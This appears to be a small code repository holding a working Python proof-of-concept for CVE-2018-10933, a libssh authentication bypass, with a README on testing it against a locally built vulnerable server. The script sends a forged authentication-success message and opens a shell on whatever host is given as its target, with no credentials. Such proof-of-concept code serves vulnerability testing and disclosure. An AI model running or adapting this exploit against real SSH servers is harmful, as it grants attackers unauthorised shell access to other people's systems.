├── .gitattributes
├── CVE-2018-10933.py
├── README.md
└── requirements.txt


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/CVE-2018-10933.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # coding: utf-8
 3 | 
 4 | import sys
 5 | import socket
 6 | import argparse
 7 | import logging
 8 | 
 9 | import paramiko
10 | from paramiko.ssh_exception import SSHException
11 | 
12 | 
13 | logger = logging.getLogger("CVE-2018-10933")
14 | 
15 | 
16 | def main(hostname="127.0.0.1", port=22):
17 | 
18 |     # Enabling Debug logging
19 |     logging.basicConfig(level=logging.DEBUG)
20 |     
21 |     try:
22 |         logger.debug("Validating TCP/22 reachability.")
23 |         sock = socket.create_connection((hostname, port))
24 |     except socket.error as e:
25 |         print('[-] Connecting to host failed. Please check the specified host and port')
26 |         return 1
27 | 
28 |     # instantiate transport
29 |     m = paramiko.message.Message()
30 |     transport = paramiko.transport.Transport(sock)
31 | 
32 |     try:
33 |         logger.debug("Attempting to start SSH client.")
34 |         transport.start_client()
35 | 
36 |         logger.debug("Sending USERAUTH_SUCCESS message.")
37 |         m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
38 |         transport._send_message(m)
39 | 
40 |         logger.debug("Attempting to open an SSH session.")
41 |         cmd_channel = transport.open_session()
42 |         logger.debug("Attempting to invoke a TTY shell.")
43 |         cmd_channel.invoke_shell()
44 |     except SSHException as e:
45 |         print('SSH Exception: {}'.format(e))
46 |         return 1
47 | 
48 | 
49 | if __name__ == '__main__':
50 |     parser = argparse.ArgumentParser(description="libssh Authentication Bypass (CVE-2018-10933)")
51 | 
52 |     parser.add_argument('hostname', help='target', type=str)
53 |     parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int)
54 | 
55 |     args = parser.parse_args()
56 | 
57 |     main(**vars(args))
58 | 
59 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-10933
 2 | to test this code: 
 3 | - get vulnerable version of libssh at homepage: https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
 4 | - uncompress and build, then go to example directory, there's a simple sshd server using libssh name: samplesshd-cb
 5 | 
 6 | run this simple sshd by command:
 7 |     $ samplesshd-cb 127.0.0.1 -p 2222
 8 | 
 9 | - run my code, output will be:
10 | 	Allocated session channel
11 | 	Allocated shell
12 | mean that i can bypass authentication and spawn a shell without any credential 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | paramiko==2.4.2
2 | 


--------------------------------------------------------------------------------